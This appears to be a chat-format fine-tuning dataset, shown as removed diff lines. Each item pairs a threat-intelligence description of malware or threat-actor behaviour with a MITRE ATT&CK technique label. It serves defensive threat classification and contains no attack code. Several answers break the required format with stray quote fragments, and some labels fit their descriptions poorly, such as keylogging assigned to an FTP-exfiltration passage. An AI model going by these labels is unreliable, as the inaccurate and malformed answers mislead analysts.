- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldMax has used scheduled tasks to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A variant uses fake TLS to communicate with the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SMOKEDHAM created a persistence mechanism for NGROK by adding VirtualHost.vbs to the WindNT value under the current users Run registry key"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The presence of this credential stealer may partially answer how Kobalos propagates. Anyone using the SSH client of a compromised machine will have their credentials captured. Those credentials can then be used by the attackers to install Kobalos on the newly discovered server later"
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has conducted internal spearphishing attacks against executives, HR, and IT personnel to gain information and access."
- },
- {
- "role": "assistant",
- "content": "T1534 - Internal Spearphishing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldenSpy can execute remote commands in the Windows command shell using the \"WinExec()\" API."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX has a module to enumerate network shares."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FatDuke can AES encrypt C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EVILNUM can harvest cookies and upload them to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1539 - Steal Web Session Cookie"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors used MSbuild to execute an actor-created file."
- },
- {
- "role": "assistant",
- "content": "T1127.001 - Trusted Developer Utilities Proxy Execution: MSBuild"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has used valid, compromised email accounts for defense evasion, including to send malicious emails to other victim organizations."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "communicates over common ports such as TCP 80, 443, and 25."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 named tasks \"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\" in order to appear legitimate."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HALFBAKED can use WMI queries to gather system information."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer can decrypt its C2 address upon execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX — A remote access tool notable for communications that may contain HTTP headers starting with \"X-\" (e.g. X-Session: 0\"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. The malware can be configured to use multiple network protocols to avoid network-based detection. DLL side loading is often used to maintain persistence on the compromised system. Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures. DLL side loading has been used to maintain persistence on the compromised system. More information about HttpBrowser is available in Appendix B. HttpBrowser URI. Source: Dell SecureWorks) - ChinaChopper web shell — A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. TG-3390 has used additional web shells containing similarly formatted passwords"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Final1stspy obtains victim Microsoft Windows version information and CPU architecture."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware gathers the Address Resolution Protocol (ARP) table from the victim."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CharmPower can use `wmic` to gather information from a system."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can collect the IP address and NetBIOS name of an infected machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Confucius has exfiltrated victim data to cloud storage service accounts."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OceanSalt can collect the computer name from the system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PyDCrypt has used netsh to find RPC connections on remote machines."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Doki uses a previously undocumented method to contact its operator by abusing the Dogecoin cryptocurrency blockchain in a unique way in order to dynamically generate its C2 domain address. The malware has managed to stay under the radar for over six months despite samples being publicly available in VirusTotal"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "captures keystrokes and sends them back to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Darkhotel malware can collect a list of running processes on a system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KOCTOPUS has relied on victims clicking on a malicious link delivered via email."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a custom binary protocol to beacon back to its C2 server. It has also used XOR for encrypting communications."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleJeus has XOR-encrypted collected system information prior to sending to a C2. AppleJeus has also used the open source ADVObfuscation library for its components."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once unpacked, the malware creates a copy of its own process with a suspended thread and injects the unpacked code into the new process before calling the ResumeThread API. Breaking on this function call in a debugger allows an analyst to dump the process and extract the unpacked Karagany binary for further analysis"
- },
- {
- "role": "assistant",
- "content": "T1055.003 - Thread Execution Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon execution, the payload injects into iexplore.exe process and starts encrypting text files and documents of the victim machine"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mis-Type runs tests to determine the privilege level of the compromised user."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Otherwise, it runs a search for the “/bin/rsyncd” string within the files found in the /etc/ folder"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kevin can exfiltrate data to the C2 server in 27-character chunks."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After trying to determine whether ports are open and the machine could act as a C2 tier 2 proxy, the proxy module also starts a multithreaded SOCKS5 proxy server. The SOCKS5 protocol is encapsulated into the QakBot proxy protocol composed of: QakBot proxy command (1 byte), version (1 byte), session id (4 bytes), total packet length (dword), data (total packet length-10). Incoming and outgoing packets are stored in the buffers and may be received/transmitted one by one or in multiple packets in a single TCP data segment (streamed"
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowGoop has disguised a PowerShell script as a .dat file (goopdate.dat)."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ragnar Locker has used sc.exe to create a new service for the VirtualBox driver."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot establishes persistence in the Startup folder."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EvilBunny has executed commands via scheduled tasks."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In November 2018, Cisco Talos published research on an attack campaign named DNSpionage. It involved attacks using malware to compromise individual endpoints, but most interestingly described an effort to specifically hijack DNS entries of government organizations to redirect visitors to likely malicious, adversary operated systems. Both FireEye and Crowdstrike followed up with their own assessments for the DNS hijacking efforts, and described operations extending back to January 2017. No attribution to any known adversary groups was provided, other than that the target radius was primarily in the Middle East and the adversary was also likely operating out of that region. "
- },
- {
- "role": "assistant",
- "content": "T1584.002 - DNS Server', 'T1583.002 - DNS Server', 'T1496 - Resource Hijacking', 'T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Besides the stolen data, it sends the Windows product name and version, username, computer name, and domain name to the C&C server"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Axiom has targeted victims with remote administration tools including RDP."
- },
- {
- "role": "assistant",
- "content": "T1563.002 - Remote Service Session Hijacking: RDP Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The binary will be saved in the %APPDATA% folder and, for persistence, it creates a scheduled task that will execute every hour"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can enumerate services on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exaramel for Windows specifies a path to store files scheduled for exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CharmPower can send victim data via FTP with credentials hardcoded in the script."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has collected files from various information repositories."
- },
- {
- "role": "assistant",
- "content": "T1213 - Data from Information Repositories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has conducted brute force password spray attacks."
- },
- {
- "role": "assistant",
- "content": "T1110.003 - Brute Force: Password Spraying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PDB Path: C:\\Users\\803\\Desktop\\ytyboth\\yty 2.0\\Release\\vstservice.pdb The vstservice.exe plugin is .NET file responsible for sending a list of the file system to the C2. The malware retrieves the C2 from a Google Docs file like the previous binaries. The file was located at the following location"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWRUNER may enumerate user directories on a victim."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "2022–01–15, MSTIC (Microsoft Threat Intelligence Center) identified and unveiled a cyberattack targeting Ukrainian organizations with “WhisperGate” overwrites Master Boot Record(MBR) and files"
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BadPatch captures screenshots in .jpg format and then exfiltrates them."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Peirates can use stolen service account tokens to perform its operations."
- },
- {
- "role": "assistant",
- "content": "T1078.004 - Valid Accounts: Cloud Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this version, the communication protocol with the C&C server was also upgraded to use AES encryption"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "searches for files created within a certain timeframe and whose file extension matches a predefined list."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX uses Pastebin to store C2 addresses."
- },
- {
- "role": "assistant",
- "content": "T1102.001 - Dead Drop Resolver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BabyShark has the ability to decode downloaded files prior to execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BACKSPACE is capable of enumerating and making modifications to an infected system's Registry."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Olympic Destroyer uses the API call \"ChangeServiceConfigW\" to disable all services on the affected system."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Thread Name Description Key logger Logs key strokes for configured processes and sends them to the command and control (C2) server Form grabber Monitors HTTP traffic for form data and sends it to the C2 server POS monitor Monitors for changes to logs stored in C:\\NSB\\Coalition\\Logs and nsb.pos.client.log and sends parsed data to the C2 server PST monitor Searches recursively for newly created Outlook personal storage table (PST) files within user directories and sends them to the C2 server HTTP proxy monitor Monitors HTTP traffic for requests sent to HTTP proxies, saves the proxy address and credentials for future use"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1090 - Proxy', 'T1041 - Exfiltration Over C2 Channel', 'T1132 - Data Encoding', 'T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor has used the Windows API to make detection more difficult."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 obtained Ticket Granting Service (TGS) tickets for Active Directory Service Principle Names to crack offline."
- },
- {
- "role": "assistant",
- "content": "T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cisco Talos has discovered a new malware campaign based on a previously unknown family we're calling \"PoetRAT. The droppers are Microsoft Word documents that deploy a Python-based remote access trojan (RAT). We named this malware PoetRAT due to the various references to William Shakespeare, an English poet and playwright. The RAT has all the standard features of this kind of malware, providing full control of the compromised system to the operation. For exfiltration, it uses FTP, which denotes an intention to transfer large amounts of data. The campaign shows us that the operators manually pushed additional tools when they needed them on the compromised systems. We will describe a couple of these tools. The most interesting is a tool used to monitor the hard disk and exfiltrate data automatically"
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Helminth executable variant is able to run batch scripts provided by the C2 server, which is very similar to the script version of this Trojan. The executable variant has one additional capability that is not present in the script version, which involves the ability to log keystrokes via a supplemental keylogger module"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1115 - Clipboard Data', 'T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Avenger has the ability to identify the host volume ID and the OS architecture on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ESTSecurity inspected a malicious lure document discussing North Korean defectors. This lure document contained a UPX packed binary that reached out to wave[.]posadadesantiago[.]com. Based upon their report we believe SHA256: 252d1b7a379f97fddd691880c1cf93eaeb2a5e5572e92a25240b75953c88736c, either is or is strikingly similar to the document discussed in their blog post based on these similarities"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has obtained and customized publicly-available tools like Mimikatz."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sliver can use mutual TLS and RSA cryptography to exchange a session key."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrongPity can use HTTP and HTTPS in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot has conducted system locale checks to see if the compromised host is in Russia, Ukraine, Belarus, Armenia, Kazakhstan, or Moldova."
- },
- {
- "role": "assistant",
- "content": "T1614 - System Location Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once APT28 gained access to the DCCC network, the group then proceeded to use that access to compromise the DNC network."
- },
- {
- "role": "assistant",
- "content": "T1199 - Trusted Relationship"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
